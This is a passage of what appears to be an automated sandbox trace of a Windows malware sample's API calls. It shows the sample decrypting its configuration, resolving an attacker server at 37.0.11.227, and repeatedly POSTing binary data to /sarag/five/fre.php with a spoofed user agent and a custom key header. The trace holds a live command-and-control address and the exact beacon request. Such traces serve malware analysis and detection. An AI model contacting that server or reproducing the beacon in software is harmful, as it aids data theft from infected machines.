(lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.025] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0191.025] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.026] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0191.026] GetProcessHeap () returned 0x690000 [0191.026] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0191.027] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.027] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0191.028] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.028] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0191.029] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.029] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0191.029] GetProcessHeap () returned 0x690000 [0191.029] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0191.029] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0191.030] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0191.030] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0191.031] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0191.035] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0191.035] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0191.036] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0191.036] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0191.036] GetProcessHeap () returned 0x690000 [0191.036] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0191.036] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0191.036] GetProcessHeap () returned 0x690000 [0191.037] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0191.037] GetProcessHeap () returned 0x690000 [0191.037] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0191.037] GetProcessHeap () returned 0x690000 [0191.038] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0191.038] GetProcessHeap () returned 0x690000 [0191.038] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0191.038] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.038] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0191.046] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.046] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0191.054] GetProcessHeap () returned 0x690000 [0191.054] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0191.055] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.055] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0191.056] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.056] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0191.057] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.057] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0191.057] GetProcessHeap () returned 0x690000 [0191.057] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0191.058] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.058] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0191.059] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.059] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0191.060] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.060] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0191.060] GetProcessHeap () returned 0x690000 [0191.060] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0191.061] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0191.061] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0191.062] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0191.062] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0191.063] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0191.063] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0191.063] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0191.064] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0191.064] GetProcessHeap () returned 0x690000 [0191.064] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0191.064] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b27e0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae8b0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0191.064] GetProcessHeap () returned 0x690000 [0191.064] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3a0 [0191.064] socket (af=2, type=1, protocol=6) returned 0x394 [0191.064] connect (s=0x394, name=0x6ae8b0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0191.090] FreeAddrInfoW (pAddrInfo=0x6b27e0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae8b0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0191.090] GetProcessHeap () returned 0x690000 [0191.090] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af078 [0191.090] GetProcessHeap () returned 0x690000 [0191.090] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b2fb8 [0191.091] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0191.092] wvsprintfA (in: param_1=0x6b2fb8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0191.093] GetProcessHeap () returned 0x690000 [0191.093] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af980 [0191.093] GetProcessHeap () returned 0x690000 [0191.093] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0191.093] GetProcessHeap () returned 0x690000 [0191.093] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0191.093] GetProcessHeap () returned 0x690000 [0191.093] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b2fb8 [0191.094] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0191.095] wvsprintfA (in: param_1=0x6b2fb8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0191.095] GetProcessHeap () returned 0x690000 [0191.095] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0191.095] GetProcessHeap () returned 0x690000 [0191.095] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0191.095] send (s=0x394, buf=0x6abd08*, len=242, flags=0) returned 242 [0191.096] send (s=0x394, buf=0x6aba40*, len=159, flags=0) returned 159 [0191.096] GetProcessHeap () returned 0x690000 [0191.096] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0191.096] recv (in: s=0x394, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0191.173] GetProcessHeap () returned 0x690000 [0191.174] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0191.174] GetProcessHeap () returned 0x690000 [0191.174] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0191.175] GetProcessHeap () returned 0x690000 [0191.175] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af980 | out: hHeap=0x690000) returned 1 [0191.175] GetProcessHeap () returned 0x690000 [0191.177] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af078 | out: hHeap=0x690000) returned 1 [0191.177] closesocket (s=0x394) returned 0 [0191.178] GetProcessHeap () returned 0x690000 [0191.178] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3a0 | out: hHeap=0x690000) returned 1 [0191.178] GetProcessHeap () returned 0x690000 [0191.178] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0191.178] GetProcessHeap () returned 0x690000 [0191.179] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0191.179] GetProcessHeap () returned 0x690000 [0191.179] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0191.180] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xbd8) returned 0x394 [0191.194] Sleep (dwMilliseconds=0xea60) [0191.196] GetProcessHeap () returned 0x690000 [0191.196] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0191.196] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.197] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0191.207] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.207] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0191.216] GetProcessHeap () returned 0x690000 [0191.216] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0191.217] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.217] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0191.218] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.218] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0191.225] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.225] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0191.226] GetProcessHeap () returned 0x690000 [0191.226] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0191.227] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.227] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0191.228] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.228] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0191.229] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.230] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0191.230] GetProcessHeap () returned 0x690000 [0191.230] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0191.230] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0191.231] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0191.232] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0191.232] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0191.233] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0191.233] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0191.234] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0191.234] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0191.234] GetProcessHeap () returned 0x690000 [0191.234] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0191.234] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0191.235] GetProcessHeap () returned 0x690000 [0191.235] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0191.235] GetProcessHeap () returned 0x690000 [0191.236] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0191.236] GetProcessHeap () returned 0x690000 [0191.236] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0191.236] GetProcessHeap () returned 0x690000 [0191.236] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0191.237] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.237] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0191.242] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.242] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0191.247] GetProcessHeap () returned 0x690000 [0191.247] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0191.248] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.248] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0191.249] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.249] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0191.250] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.250] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0191.250] GetProcessHeap () returned 0x690000 [0191.250] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0191.251] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.251] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0191.252] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.252] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0191.253] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.253] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0191.253] GetProcessHeap () returned 0x690000 [0191.253] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0191.254] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0191.254] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0191.254] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0191.255] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0191.256] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0191.256] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0191.256] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0191.257] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0191.257] GetProcessHeap () returned 0x690000 [0191.257] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0191.257] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b2e70*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae9a0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0191.257] GetProcessHeap () returned 0x690000 [0191.257] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3c0 [0191.257] socket (af=2, type=1, protocol=6) returned 0x398 [0191.257] connect (s=0x398, name=0x6ae9a0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0191.289] FreeAddrInfoW (pAddrInfo=0x6b2e70*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae9a0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0191.289] GetProcessHeap () returned 0x690000 [0191.289] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0191.289] GetProcessHeap () returned 0x690000 [0191.289] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b2fb8 [0191.289] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0191.290] wvsprintfA (in: param_1=0x6b2fb8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0191.290] GetProcessHeap () returned 0x690000 [0191.291] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af8c0 [0191.291] GetProcessHeap () returned 0x690000 [0191.291] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0191.291] GetProcessHeap () returned 0x690000 [0191.291] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0191.291] GetProcessHeap () returned 0x690000 [0191.291] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b2fb8 [0191.292] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0191.293] wvsprintfA (in: param_1=0x6b2fb8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0191.293] GetProcessHeap () returned 0x690000 [0191.293] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0191.293] GetProcessHeap () returned 0x690000 [0191.294] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0191.294] send (s=0x398, buf=0x6abd08*, len=242, flags=0) returned 242 [0191.295] send (s=0x398, buf=0x6aba40*, len=159, flags=0) returned 159 [0191.295] GetProcessHeap () returned 0x690000 [0191.295] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0191.295] recv (in: s=0x398, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0191.376] GetProcessHeap () returned 0x690000 [0191.377] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0191.377] GetProcessHeap () returned 0x690000 [0191.378] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0191.378] GetProcessHeap () returned 0x690000 [0191.379] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af8c0 | out: hHeap=0x690000) returned 1 [0191.379] GetProcessHeap () returned 0x690000 [0191.379] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0191.379] closesocket (s=0x398) returned 0 [0191.379] GetProcessHeap () returned 0x690000 [0191.380] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3c0 | out: hHeap=0x690000) returned 1 [0191.380] GetProcessHeap () returned 0x690000 [0191.380] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0191.380] GetProcessHeap () returned 0x690000 [0191.380] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0191.380] GetProcessHeap () returned 0x690000 [0191.380] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0191.381] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xa74) returned 0x398 [0191.382] Sleep (dwMilliseconds=0xea60) [0191.383] GetProcessHeap () returned 0x690000 [0191.383] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0191.384] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.384] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0191.395] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.395] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0191.402] GetProcessHeap () returned 0x690000 [0191.402] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0191.403] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.403] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d028) returned 1 [0191.404] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.404] CryptSetKeyParam (hKey=0x69d028, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0191.405] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.405] CryptSetKeyParam (hKey=0x69d028, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0191.405] GetProcessHeap () returned 0x690000 [0191.405] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0191.406] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.406] CryptDecrypt (in: hKey=0x69d028, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0191.407] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.408] CryptDestroyKey (hKey=0x69d028) returned 1 [0191.408] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.409] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0191.409] GetProcessHeap () returned 0x690000 [0191.409] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0191.409] LoadLibraryW 